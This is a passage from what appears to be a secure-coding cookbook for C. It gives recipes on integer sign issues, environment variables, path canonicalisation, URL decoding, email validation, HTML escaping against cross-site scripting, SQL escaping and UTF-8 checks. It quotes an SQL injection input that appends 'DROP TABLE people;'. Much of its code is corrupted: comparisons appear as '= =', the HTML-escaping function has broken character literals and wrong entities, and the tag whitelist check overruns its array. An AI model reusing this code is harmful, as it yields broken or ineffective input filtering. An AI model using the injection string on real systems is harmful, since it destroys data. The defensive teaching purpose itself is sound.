printf("Buffer overflow!\n");

return -1;

}

printf("%s\n", p + x);

return 0;

}

The poor programmer who wrote this code is properly preventing from reading past the high end of p, but he probably did not realize that the pointers are signed. Because x is -1 once it is cast to a signed value, the result of p + x will be the byte of memory immediately preceding the address to which p points.

While this code is a contrived example, this is still a very real problem. For example, say you have an array of fixed-size records. The program might wish to write arbitrary data into a record where the user supplies the record number, and the program might calculate the memory address of the item of interest dynamically by multiplying the record number by the size of a record, and then adding that to the address at which the records begin. Generally, programmers will make sure the item index is not too high, but they may not realize that the index might be too low!

In addition, it is good to remember that array accesses are rewritten as pointer arithmetic. For example, arr[x] can index memory before the start of your array if x is less than 0 once converted to a signed integer.

Size mismatches

You may also encounter problems when an integer type of one size gets converted to an integer type of another size. For example, suppose that you store an unsigned 64-bit quantity in x, then pass x to an operation that takes an unsigned 32-bit quantity. In C, the upper 32 bits will get truncated. Therefore, if you need to check for overflow, you had better do it before the cast happens!

Conversely, when there is an implicit coercion from a small value to a large value, remember that the sign bit will probably extend out, which may not be intended. That is, when C converts a signed value to a different-sized signed value, it does not simply start treating the same bits as a signed value. When growing a number, C will make sure that it retains the same value it once had, even if the binary representation is different. When shrinking the value, C may truncate, but even if it does, the sign will be the same as it was before truncation, which may result in an unexpected binary representation.

For example, you might have a string declared as a char *, then want to treat the bytes as integers. Consider the following code:

int main(int argc, char *argv[ ]) {

int x = 0;

if (argc > 1) x += argv[1][0];

printf("%d\n", x);

}

If argv[1][0] happens to be 0xFF, x will end up -1 instead of 255! Even if you declare x to be an unsigned int, you will still end up with x being 0xFFFFFFFF instead of the desired 0xFF, because C converts size before sign. That is, a char will get sign-extended into an int before being coerced into an unsigned int.

Wrap-around

A very similar problem (with the same remediation strategy as those described in previous subsections) occurs when a variable wraps around. For example, when you add 1 to the maximum unsigned value, you will get zero. When you add 1 to the maximum signed value, you will get the minimum possible signed value.

This problem often crops up when using a high-precision clock. For example, some people use a 32-bit real-time clock, then check to see if one event occurs before another by testing the clock. Of course, if the clock rolls over (a millisecond clock that uses an unsigned 32-bit value will wrap around every 49.71 days or so), the result of your test is likely to be wrong!

In any case, you should be keeping track of wrap-arounds and taking appropriate measures when they occur. Often, when you're using a real-time clock, you can simply use a clock with more precision. For example, recent x86 chips offer the RDTSC instruction, which provides 64 bits of precision. (See Recipe 4.14.)

See Also

Recipe 4.14

3.6. Using Environment Variables Securely

Problem

You need to obtain the value of, alter the value of, or delete an environment variable.

Solution

A process inherits its environment variables from its parent process. While the parent process most often will not do anything to tarnish the environment passed on to its children, your program's environment variables are still external inputs, and you must therefore treat them as such.

The process that parents your own process could be a malicious process that has manipulated the environment in an attempt to confuse your program and exploit that confusion to nefarious ends. As much as possible, it is best to avoid depending on the environment, but we recognize that is not always possible.

Discussion

In the following subsections, we'll look at obtaining the value of an environment variable as well as changing and deleting environment variables.

Obtaining the value of an environment variable

The normal means by which you obtain the value of an environment variable is by calling getenv( ) with the name of the environment variable whose value is to be retrieved. The problem with getenv( ) is that it simply returns a pointer into the environment, rather than returning a copy of the environment variable's value.

If you do not immediately make a copy of the value returned by getenv( ), but instead store the pointer somewhere for later use, you could end up with a dangling pointer or a different value altogether, if the environment is modified between the time that you called getenv( ) and the time you use the pointer it returns.

WARNING

There is a race condition here even after you call getenv() and before you copy. Be careful to only manipulate the process environment from a single thread at a time.

Never make any assumptions about the length or the contents of an environment variable's value. It can be extremely dangerous to simply copy the value into a statically allocated buffer or even a dynamically allocated buffer that was not allocated based on the actual size of the environment variable's value. Always compute the size of the environment variable's value yourself, and dynamically allocate a buffer to hold the copy.

Another problem with environment variables is that a malicious program could manipulate the environment so that two or more environment variables with the same name exist in your process's environment. It is easy to detect this situation, but it usually is not worth concerning yourself with it. Most, if not all, implementations of getenv( ) will always return the first occurrence of an environment variable.

As a convenience, you can use the function spc_getenv( ) , shown in the following code, to obtain the value of an environment variable. It will return a copy of the environment variable's value allocated with strdup( ) , which means that you will be responsible for freeing the memory withfree( ) .

#include <stdlib.h>

#include <string.h>

char *spc_getenv(const char *name) {

char *value;

if (!(value = getenv(name))) return 0;

return strdup(value);

}

Changing the value of an environment variable

The standard C runtime function putenv( ) is normally used to modify the value of an environment variable. In some implementations, putenv( ) can even be used to delete environment variables, but this behavior is nonstandard and therefore is not portable. If you have sanitized the environment as described in Recipe 1.1, and particularly if you use the code in that recipe, using putenv( ) could cause problems because of the way that code manages the memory allocated to the environment. We recommend that you avoid using the putenv( ) function altogether.

Another reason to avoid putenv( ) is that an attacker could have manipulated the environment before spawning your process, in such a way that two or more environment variables share the same name. You want to make certain that changing the value of an environment variable actually changes it. If you use the code from Recipe 1.1, you can be reasonably certain that there is only one environment variable for each name.

Instead of using putenv( ) to modify the value of an environment variable, use spc_putenv( ) , shown in the following code. It will properly handle an environment as the code in Recipe 1.1 builds it, as well as an unaltered environment. In addition to modifying the value of an environment variable, spc_putenv( ) is also capable of adding new environment variables.

We have not copied putenv( )'s signature with spc_putenv( ). If you use putenv( ), you must pass it a string of the form "NAME=VALUE". If you use spc_putenv( ), you must pass it two strings; the first string is the name of the environment variable to modify or add, and the second is the value to assign to the environment variable. If an error occurs, spc_putenv( ) will return -1; otherwise, it will return 0.

Note that the following code is not thread-safe. You need to explicitly avoid the possibility of manipulating the environment from two separate threads at the same time.

#include <stdlib.h>

#include <string.h>

static int spc_environ;

int spc_putenv(const char *name, const char *value) {

int del = 0, envc, i, mod = -1;

char *envptr, **new_environ;

size_t delsz = 0, envsz = 0, namelen, valuelen;

extern char **environ;

/* First compute the amount of memory required for the new environment */

namelen = strlen(name);

valuelen = strlen(value);

for (envc = 0; environ[envc]; envc++) {

if (!strncmp(environ[envc], name, namelen) && environ[envc][namelen] = = '=') {

if (mod = = -1) mod = envc;

else {

del++;

delsz += strlen(environ[envc]) + 1;

}

}

envsz += strlen(environ[envc]) + 1;

}

if (mod = = -1) {

envc++;

envsz += (namelen + valuelen + 1 + 1);

}

envc -= del; /* account for duplicate entries of the same name */

envsz -= delsz;

/* allocate memory for the new environment */

envsz += (sizeof(char *) * (envc + 1));

if (!(new_environ = (char **)malloc(envsz))) return 0;

envptr = (char *)new_environ + (sizeof(char *) * (envc + 1));

/* copy the old environment into the new environment, replacing the named

* environment variable if it already exists; otherwise, add it at the end.

*/

for (envc = i = 0; environ[envc]; envc++) {

if (del && !strncmp(environ[envc], name, namelen) &&

environ[envc][namelen] = = '=') continue;

new_environ[i++] = envptr;

if (envc != mod) {

envsz = strlen(environ[envc]);

memcpy(envptr, environ[envc], envsz + 1);

envptr += (envsz + 1);

} else {

memcpy(envptr, name, namelen);

memcpy(envptr + namelen + 1, value, valuelen);

envptr[namelen] = '=';

envptr[namelen + valuelen + 1] = 0;

envptr += (namelen + valuelen + 1 + 1);

}

}

if (mod = = -1) {

new_environ[i++] = envptr;

memcpy(envptr, name, namelen);

memcpy(envptr + namelen + 1, value, valuelen);

envptr[namelen] = '=';

envptr[namelen + valuelen + 1] = 0;

}

new_environ[i] = 0;

/* possibly free the old environment, then replace it with the new one */

if (spc_environ) free(environ);

environ = new_environ;

spc_environ = 1;

return 1;

}

Deleting an environment variable

No method for deleting an environment variable is defined in any standard. Some implementations of putenv( ) will delete environment variables if the assigned value is a zero-length string. Other systems provide implementations of a function called unsetenv( ) , but it is nonstandard and thus nonportable.

None of these methods of deleting environment variables take into account the possibility that multiple occurrences of the same environment variable may exist in the environment. Usually, only the first occurrence will be deleted, rather than all of them. The result is that the environment variable won't actually be deleted because getenv( ) will return the next occurrence of the environment variable.

Especially if you use the code from Recipe 1.1 to sanitize the environment, or if you use the code from the previous subsection, you should use spc_delenv( ) to delete an environment variable. The following code for spc_delenv( ) depends on the static variable spc_environ declared at global scope in the spc_putenv( ) code from the previous subsection; the two functions should share the same instance of that variable.

Note that the following code is not thread-safe. You need to explicitly avoid the possibility of manipulating the environment from two separate threads at the same time.

#include <stdlib.h>

#include <string.h>

int spc_delenv(const char *name) {

int del = 0, envc, i, idx = -1;

size_t delsz = 0, envsz = 0, namelen;

char *envptr, **new_environ;

extern int spc_environ;

extern char **environ;

/* first compute the size of the new environment */

namelen = strlen(name);

for (envc = 0; environ[envc]; envc++) {

if (!strncmp(environ[envc], name, namelen) && environ[envc][namelen] = = '=') {

if (idx = = -1) idx = envc;

else {

del++;

delsz += strlen(environ[envc]) + 1;

}

}

envsz += strlen(environ[envc]) + 1;

}

if (idx = = -1) return 1;

envc -= del; /* account for duplicate entries of the same name */

envsz -= delsz;

/* allocate memory for the new environment */

envsz += (sizeof(char *) * (envc + 1));

if (!(new_environ = (char **)malloc(envsz))) return 0;

envptr = (char *)new_environ + (sizeof(char *) * (envc + 1));

/* copy the old environment into the new environment, ignoring any

* occurrences of the environment variable that we want to delete.

*/

for (envc = i = 0; environ[envc]; envc++) {

if (envc = = idx || (del && !strncmp(environ[envc], name, namelen) &&

environ[envc][namelen] = = '=')) continue;

new_environ[i++] = envptr;

envsz = strlen(environ[envc]);

memcpy(envptr, environ[envc], envsz + 1);

envptr += (envsz + 1);

}

/* possibly free the old environment, then replace it with the new one */

if (spc_environ) free(environ);

environ = new_environ;

spc_environ = 1;

return 1;

}

See Also

Recipe 1.1

3.7. Validating Filenames and Paths

Problem

You need to resolve the path of a file provided by a user to determine the actual file that it refers to on the filesystem.

Solution

On Unix systems, use the function realpath( ) to resolve the canonical name of a file or path. On Windows, use the function GetFullPathName( ) to resolve the canonical name of a file or path.

Discussion

You must be careful when making access decisions for a file. Taking relative pathnames and links into account, it is possible for multiple filenames to refer to the same file. Failure to take this into account when attempting to perform access checks based on filename can have severe consequences.

On the surface, resolving the canonical name of a file or path may appear to be a reasonably simple task to undertake. However, many programmers fail to consider symbolic and hard links. On Windows, links are possible, but they are not as serious an issue as they are on Unix because they are much less frequently used.

Fortunately, most modern Unix systems provide, as part of the standard C runtime, a function called realpath( ) that will properly resolve the canonical name of a file or path, taking relative paths and links into account. Be careful when using realpath( ) because the function is not thread-safe, and the resolved path is stored in a fixed-size buffer that must be at least MAXPATHLEN bytes in size.

WARNING

The function realpath( ) is not thread-safe because it changes the current directory as it resolves the path. On Unix, a process has a single current directory, regardless of how many threads it has, so changing the current directory in one thread will affect all other threads within the process.

The signature for realpath( ) is:

char *realpath(const char *pathname, char resolved_path[MAXPATHLEN]);

This function has the following arguments:

pathname

Path to be resolved.

resolved_path

Buffer into which the resolved path will be written. It must be at least MAXPATHLEN bytes in size. realpath( ) will never write more than that into the buffer, including the NULL-terminating byte.

If the function fails for any reason, the return value will be NULL, and errno will contain an error code indicating the reason for the failure. If the function is successful, a pointer to resolved_path will be returned.

On Windows, there is an equivalent function to realpath( ) called GetFullPathName( ) . It will resolve relative paths, link information, and even UNC (Microsoft's Universal Naming Convention) names. The function is more flexible than its Unix counterpart in that it is thread-safe and provides an interface to allow you to dynamically allocate enough memory to hold the resolved canonical path.

The signature for GetFullPathName( ) is:

DWORD GetFullPathName(LPCTSTR lpFileName, DWORD nBufferLength, LPTSTR lpBuffer,

LPTSTR *lpFilePath);

This function has the following arguments:

lpFileName

Path to be resolved.

nBufferLength

Size of the buffer, in characters, into which the resolved path will be written.

lpBuffer

Buffer into which the resolved path will be written.

lpFilePart

Pointer into lpBuffer that points to the filename portion of the resolved path. GetFullPathName( ) will set this pointer on return if it is successful in resolving the path.

When you initially call GetFullPathName( ), you should specifiy NULL for lpBuffer, and 0 for nBufferLength. When you do this, the return value from GetFullPathName( ) will be the number of characters required to hold the resolved path. After you allocate the necessary buffer space, callGetFullPathName( ) again with nBufferLength and lpBuffer filled in appropriately.

WARNING

GetFullPathName( ) requires the length of the buffer to be specified in characters, not bytes. Likewise, the return value from the function will be in units of characters rather than bytes. When allocating memory for the buffer, be sure to multiply the number of characters by sizeof(TCHAR).

If an error occurs in resolving the path, GetFullPathName( ) will return 0, and you can call GetLastError( ) to determine the cause of the error; otherwise, it will return the number of characters written into lpBuffer.

In the following example, SpcResolvePath( ) demonstrates how to use GetFullPathName( ) properly. If it is successful, it will return a dynamically allocated buffer that contains the resolved path; otherwise, it will return NULL. The allocated buffer must be freed by calling LocalFree( ).

#include <windows.h>

LPTSTR SpcResolvePath(LPCTSTR lpFileName) {

DWORD dwLastError, nBufferLength;

LPTSTR lpBuffer, lpFilePart;

if (!(nBufferLength = GetFullPathName(lpFileName, 0, 0, &lpFilePart))) return 0;

if (!(lpBuffer = (LPTSTR)LocalAlloc(LMEM_FIXED, sizeof(TCHAR) * nBufferLength)))

return 0;

if (!GetFullPathName(lpFileName, nBufferLength, lpBuffer, &lpFilePart)) {

dwLastError = GetLastError( );

LocalFree(lpBuffer);

SetLastError(dwLastError);

return 0;

}

return lpBuffer;

}

3.8. Evaluating URL Encodings

Problem

You need to decode a Uniform Resource Locator (URL).

Solution

Iterate over the characters in the URL looking for a percent symbol followed by two hexadecimal digits. When such a sequence is encountered, combine the hexadecimal digits to obtain the character with which to replace the entire sequence. For example, in the ASCII character set, the letter "A" has the value 0x41, which could be encoded as "%41".

Discussion

RFC 1738 defines the syntax for URLs. Section 2.2 of that document also defines the rules for encoding characters in a URL. While some characters must always be encoded, any character may be encoded. Essentially, this means that before you do anything with a URL—whether you need to parse the URL into pieces (i.e., username, password, host, and so on), match portions of the URL against a whitelist or blacklist, or something else entirely—you need to decode it.

The problem is that you must make certain that you never decode a URL that has already been decoded; otherwise, you will be vulnerable to double-encoding attacks. Suppose that the URL contains the sequence "%25%34%31". Decoded once, the result is "%41" because "%25" is the encoding for the percent symbol, "%34" is the encoding for the number 4, and "%31" is the encoding for the number 1. Decoded twice, the result is "A".

At first glance, this may seem harmless, but what if you were to decode repeatedly until there were no more escaped characters? You would end up with certain sequences of characters that are impossible to represent. The purpose of encoding in the first place is to allow the use of characters that have special meaning or that cannot be represented visually.

Another potential problem with encoding that is limited primarily to C and C++ is that a NULL -terminator can be encoded anywhere in the URL. There are several approaches to dealing with this problem. One is to treat the decoded string as a binary array rather than a C-style string; another is to use the SafeStr library described in Recipe 3.4 because it gives no special significance to any one character.

You can use the following spc_decode_url( ) function to decode a URL. It returns a dynamically allocated copy of the URL in decoded form. The result will be NULL-terminated, so it may be treated as a C-style string, but it may contain embedded NULLs as well. You can determine whether it contains embedded NULLs by comparing the number of bytes spc_decode_url( ) indicates that it returns with the result of calling strlen( ) on the decoded URL. If the URL contains embedded NULLs, the result from strlen( ) will be less than the number of bytes indicated by spc_decode_url( ).

#include <stdlib.h>

#include <string.h>

#include <ctype.h>

#define SPC_BASE16_TO_10(x) (((x) >= '0' && (x) <= '9') ? ((x) - '0') : \

(toupper((x)) - 'A' + 10))

char *spc_decode_url(const char *url, size_t *nbytes) {

char *out, *ptr;

const char *c;

if (!(out = ptr = strdup(url))) return 0;

for (c = url; *c; c++) {

if (*c != '%' || !isxdigit(c[1]) || !isxdigit(c[2])) *ptr++ = *c;

else {

*ptr++ = (SPC_BASE16_TO_10(c[1]) * 16) + (SPC_BASE16_TO_10(c[2]));

c += 2;

}

}

*ptr = 0;

if (nbytes) *nbytes = (ptr - out); /* does not include null byte */

return out;

}

See Also

§ RFC 1738: Uniform Resource Locators (URL)

§ Recipe 3.4

3.9. Validating Email Addresses

Problem

Your program accepts an email address as input, and you need to verify that the supplied address is valid.

Solution

Scan the email address supplied by the user, and validate it against the lexical rules set forth in RFC 822.

Discussion

RFC 822 defines the syntax for email addresses. Unfortunately, the syntax is complex, and it supports several address formats that are no longer relevant. The fortunate thing is that if anyone attempts to use one of these no-longer-relevant address formats, you can be reasonably certain they are attempting to do something they are not supposed to do.

You can use the following spc_email_isvalid( ) function to check the format of an email address. It will perform only a syntactical check and will not actually attempt to verify the authenticity of the address by attempting to deliver mail to it or by performing any DNS lookups on the domain name portion of the address.

The function only validates the actual email address and will not accept any associated data. For example, it will fail to validate "Bob Bobson <bob@bobson.com>", but it will successfully validate "bob@bobson.com". If the supplied email address is syntactically valid, spc_email_isvalid( )will return 1; otherwise, it will return 0.

TIP

Keep in mind that almost any character is legal in an email address if it is properly quoted, so if you are passing an email address to something that may be sensitive to certain characters or character sequences (such as a command shell), you must be sure to properly escape those characters.

#include <string.h>

int spc_email_isvalid(const char *address) {

int count = 0;

const char *c, *domain;

static char *rfc822_specials = "()<>@,;:\\\"[]";

/* first we validate the name portion (name@domain) */

for (c = address; *c; c++) {

if (*c == '\"' && (c == address || *(c - 1) == '.' || *(c - 1) ==

'\"')) {

while (*++c) {

if (*c == '\"') break;

if (*c == '\\' && (*++c == ' ')) continue;

if (*c <= ' ' || *c >= 127) return 0;

}

if (!*c++) return 0;

if (*c == '@') break;

if (*c != '.') return 0;

continue;

}

if (*c == '@') break;

if (*c <= ' ' || *c >= 127) return 0;

if (strchr(rfc822_specials, *c)) return 0;

}

if (c == address || *(c - 1) == '.') return 0;

/* next we validate the domain portion (name@domain) */

if (!*(domain = ++c)) return 0;

do {

if (*c == '.') {

if (c == domain || *(c - 1) == '.') return 0;

count++;

}

if (*c <= ' ' || *c >= 127) return 0;

if (strchr(rfc822_specials, *c)) return 0;

} while (*++c);

return (count >= 1);

}

See Also

RFC 822: Standard for the Format of ARPA Internet Text Messages

3.10. Preventing Cross-Site Scripting

Problem

You are developing a web-based application, and you want to ensure that an attacker cannot exploit it in an effort to steal information from the browsers of other people visiting the same site.

Solution

When you are generating HTML that must contain external input, be sure to escape that input so that if it contains embedded HTML tags, the tags are not treated as HTML by the browser.

Discussion

Cross-site scripting attacks (often called CSS, but more frequently XSS in an effort to avoid confusion with cascading style sheets) are a general class of attacks with a common root cause: insufficient input validation. The goal of many cross-site scripting attacks is to steal information (usually the contents of some specific cookie) from unsuspecting users. Other times, the goal is to get an unsuspecting user to launch an attack on himself. These attacks are especially a problem for sites that store sensitive information, such as login data or session IDs, in cookies. Cookie theft could allow an attacker to hijack a session or glean other information that is intended to be private.

Consider, for example, a web-based message board, where many different people visit the site to read the messages that other people have posted, and to post messages themselves. When someone posts a new message to the board, if the message board software does not properly validate the input, the message could contain malicious HTML that, when viewed by other people, performs some unexpected action. Usually an attacker will attempt to embed some JavaScript code that steals cookies, or something similar.

Often, an attacker has to go to greater lengths to exploit a cross-site script vulnerability; the example described above is simplistic. An attacker can exploit any page that will include unescaped user input, but usually the attacker has to trick the user into displaying that page somehow. Attackers use many methods to accomplish this goal, such as fake pages that look like part of the site from which the attacker wishes to steal cookies, or embedded links in innocent-looking email messages.

It is not generally a good idea to allow users to embed HTML in any input accepted from them, but many sites allow simple tags in some input, such as those that enable bold or italics on text. Disallowing HTML altogether is the right solution in most cases, and it is the only solution that will guarantee that cross-site scripting will be prevented. Other common attempts at a solution, such as checking the referrer header for all requests (the referrer header is easily forged), do not work.

To disallow HTML in user input, you can do one of the following:

§ Refuse to accept anything that looks as if it may be HTML

§ Escape the special characters that enable a browser to interpret data as HTML

Attempting to recognize HTML and refuse it can be error-prone, unless you only look for the use of the greater-than (>) and less-than (<) symbols. Trying to match tags that will not be allowed (i.e., a blacklist) is not a good idea because it is difficult to do, and future revisions of HTML are likely to introduce new tags. Instead, if you are going to allow some tags to pass through, you should take the whitelist approach and only allow tags that you know are safe.

WARNING

JavaScript code injection does not require a <script> tag; many other tags can contain JavaScript code as well. For example, most tags support attributes such as "onclick" and "onmouseover" that can contain JavaScript code.

The following spc_escape_html( ) function will replace occurrences of special HTML characters with their escape sequences. For example, input that contains something like "<script>" will be replaced with "<script>", which no browser should ever interpret as HTML.

Our function will escape most HTML tags, but it will also allow some through. Those that it allows through are contained in a whitelist, and it will only allow them if the tags are used without any attributes. In addition, the a (anchor) tag will be allowed with a heavily restricted href attribute. The attribute must begin with "http://", and it must be the only attribute. The character set allowed in the attribute's value is also heavily restricted, which means that not all necessarily valid URLs will successfully make it through. In particular, if the URL contains "#", "?", or "&", which are certainly valid and all have special meaning, the tag will not be allowed.

If you do not want to allow any HTML through at all, you can simply remove the call to spc_allow_tag() in spc_escape_html(), and force all possible HTML to be properly escaped. In many cases, this will actually be the behavior that you'll want.

spc_escape_html() will return a C-style string dynamically allocated with malloc(), which the caller is responsible for deallocating with free(). If memory cannot be allocated, the return will be NULL. It also expects a C-style string containing the text to filter as its only argument.

#include <stdlib.h>

#include <string.h>

#include <ctype.h>

/* These are HTML tags that do not take arguments. We special-case the <a> tag

* since it takes an argument. We will allow the tag as-is, or we will allow a

* closing tag (e.g., </p>). Additionally, we process tags in a case-

* insensitive way. Only letters and numbers are allowed in tags we can allow.

* Note that we do a linear search of the tags. A binary search is more

* efficient (log n time instead of linear), but more complex to implement.

* The efficiency hit shouldn't matter in practice.

*/

static unsigned char *allowed_formatters[] = {

"b", "big", "blink", "i", "s", "small", "strike", "sub", "sup", "tt", "u",

"abbr", "acronym", "cite", "code", "del", "dfn", "em", "ins", "kbd", "samp",

"strong", "var", "dir", "li", "dl", "dd", "dt", "menu", "ol", "ul", "hr",

"br", "p", "h1", "h2", "h3", "h4", "h5", "h6", "center", "bdo", "blockquote",

"nobr", "plaintext", "pre", "q", "spacer",

/* include "a" here so that </a> will work */

"a"

};

#define SKIP_WHITESPACE(p) while (isspace(*p)) p++

static int spc_is_valid_link(const char *input) {

static const char *href = "href";

static const char *http = "http://";

int quoted_string = 0, seen_whitespace = 0;

if (!isspace(*input)) return 0;

SKIP_WHITESPACE(input);

if (strncasecmp(href, input, strlen(href))) return 0;

input += strlen(href);

SKIP_WHITESPACE(input);

if (*input++ != '=') return 0;

SKIP_WHITESPACE(input);

if (*input == '"') {

quoted_string = 1;

input++;

}

if (strncasecmp(http, input, strlen(http))) return 0;

for (input += strlen(http); *input && *input != '>'; input++) {

switch (*input) {

case '.': case '/': case '-': case '_':

break;

case '"':

if (!quoted_string) return 0;

SKIP_WHITESPACE(input);

if (*input != '>') return 0;

return 1;

default:

if (isspace(*input)) {

if (seen_whitespace && !quoted_string) return 0;

SKIP_WHITESPACE(input);

seen_whitespace = 1;

break;

}

if (!isalnum(*input)) return 0;

break;

}

}

return (*input && !quoted_string);

}

static int spc_allow_tag(const char *input) {

int i;

char *tmp;

if (*input == 'a')

return spc_is_valid_link(input + 1);

if (*input == '/') {

input++;

SKIP_WHITESPACE(input);

}

for (i = 0; i < sizeof(allowed_formatters); i++) {

if (strncasecmp(allowed_formatters[i], input, strlen(allowed_formatters[i])))

continue;

else {

tmp = input + strlen(allowed_formatters[i]);

SKIP_WHITESPACE(tmp);

if (*input == '>') return 1;

}

}

return 0;

}

/* Note: This interface expects a C-style NULL-terminated string. */

char *spc_escape_html(const char *input) {

char *output, *ptr;

size_t outputlen = 0;

const char *c;

/* This is a worst-case length calculation */

for (c = input; *c; c++) {

switch (*c) {

case '<': outputlen += 4; break; /* < */

case '>': outputlen += 4; break; /* > */

case '&': outputlen += 5; break; /* & */

case '\': outputlen += 6; break; /* " */

default: outputlen += 1; break;

}

}

if (!(output = ptr = (char *)malloc(outputlen + 1))) return 0;

for (c = input; *c; c++) {

switch (*c) {

case '<':

if (!spc_allow_tag(c + 1)) {

*ptr++ = '&'; *ptr++ = 'l'; *ptr++ = 't'; *ptr++ = ';';

break;

} else {

do {

*ptr++ = *c;

} while (*++c != '>');

*ptr++ = '>';

break;

}

case '>':

*ptr++ = '&'; *ptr++ = 'g'; *ptr++ = 't'; *ptr++ = ';';

break;

case '&':

*ptr++ = '&'; *ptr++ = 'a'; *ptr++ = 'm'; *ptr++ = 'p';

*ptr++ = ';';

break;

case ''':

*ptr++ = '&'; *ptr++ = 'q'; *ptr++ = 'u'; *ptr++ = 'o';

*ptr++ = 't'; *ptr++ = 't';

break;

default:

*ptr++ = *c;

break;

}

}

*ptr = 0;

return output;

}

3.11. Preventing SQL Injection Attacks

Problem

You are developing an application that interacts with a SQL database, and you need to defend against SQL injection attacks.

Solution

SQL injection attacks are most common in web applications that use a database to store data, but they can occur anywhere that a SQL command string is constructed from any type of input from a user. Specifically, a SQL injection attack is mounted by inserting characters into the command string that creates a compound command in a single string. For example, suppose a query string is created with a WHERE clause that is constructed from user input. A proper command might be:

SELECT * FROM people WHERE first_name="frank";

If the value "frank" comes directly from user input and is not properly validated, an attacker could include a closing double quote and a semicolon that would complete the SELECT command and allow the attacker to append additional commands. For example:

SELECT * FROM people WHERE first_name="frank"; DROP TABLE people;

Obviously, the best way to avoid SQL injection attacks is to not create SQL command strings that include any user input. In some small number of applications, this may be feasible, but more frequently it is not. Avoid including user input in SQL commands as much as you can, but where it cannot be avoided, you should escape dangerous characters.

Discussion

SQL injection attacks are really just general input validation problems. Unfortunately, there is no perfect solution to preventing these types of attacks. Your best defense is to apply strict checking of input—even going so far as to refuse questionable input rather than attempt to escape it—and hope that that is a strong enough defense.

There are two main approaches that can be taken to avoid SQL injection attacks:

Restrict user input to the smallest character set possible, and refuse any input that contains character outside of that set.

In many cases, user input needs to be used in queries such as looking up a username or a message number, or some other relatively simple piece of information. It is rare to need any character in a user name other than the set of alphanumeric characters. Similarly, message numbers or other similar identifiers can safely be restricted to digits.

With SQL, problems start to occur when symbol characters that have special meaning are allowed. Examples of such characters are quotes (both double and single), semicolons, percent symbols, hyphens, and underscores. Avoid these characters wherever possible; they are often unnecessary, and allowing them at all just makes things more difficult for everyone except an attacker.

Escape characters that have special significant to SQL command processors.

In SQL parlance, anything that is not a keyword or an identifier is a literal. Keywords are portions of a SQL command such as SELECT or WHERE, and an identifier would typically be the name of a table or the name of a field. In some cases, SQL syntax allows literals to appear without enclosing quotes, but as a general rule you should always enclose literals with quotes.

Literals should always be enclosed in single quotes ('), but some SQL implementations allow you to use either single or double quotes ("). Whichever you choose to use, always close the literal with the same character with which you opened it.

Within literals, most characters are safe to leave unescaped, and in many cases, it is not possible to escape them. Certainly, with whichever quoting character you choose to use with your literals, you may need to allow that character inside the literal. Escaping quotes is done by doubling up on the quote character. Other characters that should always be escaped are control characters and the escape character itself (a backslash).

Finally, if you are using the LIKE keyword in a WHERE clause, you may wish to prevent input from containing wildcard characters. In fact, it is a good idea to prevent wildcard characters in most circumstances. Wildcard characters include the percent symbol, underscore, and square brackets.

You can use the function spc_escape_sql( ) , shown at the end of this section, to escape all of the characters that we've mentioned. As a convenience (and partly due to necessity), the function will also surround the escaped string with the quote character of your choice. The return from the function will be the quoted and escaped version of the input string. If an error occurs (e.g., out of memory, or an invalid quoting character chosen), the return will be NULL.

spc_escape_sql( ) requires three arguments:

input

The string that is to be escaped.

quote

The quote character to use. It must be either a single or double quote. Any other character will cause spc_escape_sql( ) to return failure.

wildcards

If this argument is specified as 0, wildcard characters recognized by the LIKE operator in a WHERE clause will not be escaped; otherwise, they will be. You should only escape wildcards when you are going to be using the escaped string as the right-hand side for the LIKE operator.

#include <stdlib.h>

#include <string.h>

char *spc_escape_sql(const char *input, char quote, int wildcards) {

char *out, *ptr;

const char *c;

/* If every character in the input needs to be escaped, the resulting string

* would at most double in size. Also, include room for the surrounding

* quotes.

*/

if (quote != '\'' && quote != '\"') return 0;

if (!(out = ptr = (char *)malloc(strlen(input) * 2 + 2 + 1))) return 0;

*ptr++ = quote;

for (c = input; *c; c++) {

switch (*c) {

case '\'': case '\"':

if (quote == *c) *ptr++ = *c;

*ptr++ = *c;

break;

case '%': case '_': case '[': case ']':

if (wildcards) *ptr++ = '\\';

*ptr++ = *c;

break;

case '\\': *ptr++ = '\\'; *ptr++ = '\\'; break;

case '\b': *ptr++ = '\\'; *ptr++ = 'b'; break;

case '\n': *ptr++ = '\\'; *ptr++ = 'n'; break;

case '\r': *ptr++ = '\\'; *ptr++ = 'r'; break;

case '\t': *ptr++ = '\\'; *ptr++ = 't'; break;

default:

*ptr++ = *c;

break;

}

}

*ptr++ = quote;

*ptr = 0;

return out;

}

3.12. Detecting Illegal UTF-8 Characters

Problem

Your program accepts external input in UTF-8 encoding. You need to make sure that the UTF-8 encoding is valid.

Solution

Scan the input string for illegal UTF-8 sequences. If any illegal sequences are detected, reject the input.

Discussion

UTF-8 is an encoding that is used to represent multibyte character sets in a way that is backward-compatible with single-byte character sets. Another advantage of UTF-8 is that it ensures there are no NULL bytes in the data, with the exception of an actual NULL byte. Encodings such as Unicode's UCS-2 may (and often do) contain NULL bytes as "padding" if they are treated as byte streams. For example, the letter "A" is 0x41 in ASCII or UTF-8, but it is 0x0041 in UCS-2.

The first byte in a UTF-8 sequence determines the number of bytes that follow it to make up the complete sequence. The number of upper bits set in the first byte minus one indicates the number of bytes that follow. A bit that is never set immediately follows the count, and the remaining bits are used as part of the character encoding. The bytes that follow the first byte will always have the upper two bits set and unset, respectively; the remaining bits are combined with the encoding bits from the other bytes in the sequence to compute the character. Table 3-2 lists the binary encodings for the range of characters from 0x00000000 to 0x7FFFFFFF.

Table 3-2. UTF-8 encoding byte sequences

Byte range

UTF-8 binary representation

0x00000000 - 0x0000007F

0bbbbbbb

0x00000080 - 0x000007FF

110bbbbb 10bbbbbb

0x00000800 - 0x0000FFFF

1110bbbb 10bbbbbb 10bbbbbb

0x00010000 - 0x001FFFFF

11110bbb 10bbbbbb 10bbbbbb 10bbbbbb

0x00200000 - 0x03FFFFFF

111110bb 10bbbbbb 10bbbbbb 10bbbbbb 10bbbbbb

0x04000000 - 0x7FFFFFFF

1111110b 10bbbbbb 10bbbbbb 10bbbbbb 10bbbbbb 10bbbbbb

The problem with UTF-8 encoding is that invalid sequences can be embedded in the data. The UTF-8 specification states that the only legal encoding for a character is the shortest sequence of bytes that yields the correct value. Longer sequences may be able to produce the same value as a shorter sequence, but they are not legal; such a longer sequence is called an overlong sequence .

The security issue posed by overlong sequences is that allowing them makes it significantly more difficult to analyze a UTF-8 encoded string because multiple representations are possible for the same character. It would be possible to recognize overlong sequences and convert them to the shortest sequence, but we recommend against doing that because there may be other issues involved that have not yet been discovered. We recommend that you reject any input that contains an overlong sequence.

